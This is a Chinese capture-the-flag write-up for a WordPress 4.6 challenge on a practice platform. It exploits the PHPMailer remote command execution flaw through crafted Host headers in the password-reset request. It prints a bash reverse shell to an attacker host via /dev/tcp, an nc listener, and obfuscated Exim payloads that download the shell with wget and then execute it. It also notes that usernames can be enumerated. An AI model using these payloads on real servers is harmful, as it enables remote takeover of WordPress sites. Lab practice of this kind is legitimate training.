安鸾渗透实战平台（cms系列）wordpress01 (200分)

漏洞环境

安鸾渗透实战平台
公网云主机一台（用来接收反弹shell和发送文件）

题目：

通过查看源码得知版本号为4.6

找该版本的历史漏洞

挑选一个姿势进行复现

这里我用的是反弹shell的手法
参考链接：https://www.freebuf.com/vuls/319313.html

漏洞原理：

WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(本 ＜5,2.18)存在远程命令执行漏洞，攻击者只需巧炒地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危書。

漏洞地点

发送邮箱验证的地方
注意：需要有正确的用户名，不过网站会告诉你用户名存不存在，fuzz就行，这里admin是存在的，反而user是不存在
admin存在

云主机上做准备

1、编写1.txt

bash -i >& /dev/tcp/云主机IP/端口 0>&1

2、在1.txt这个文件下开启一个web服务，这里建议用python

python3 -m http.server 80

3、开启监听

 nc -lnp 3389

使用bp抓包，构造攻击

更改的是host字段

Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}云主机的IP地址${substr{0}{1}{$spool_directory}}1.txt}}null)

该请求会让受害的web服务器去下载你的1.txt这个文件，在云主机上可以看到对应的请求

使用下一个poc让受害服务器执行1.TXT的内容（反弹shell）

Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)

找flag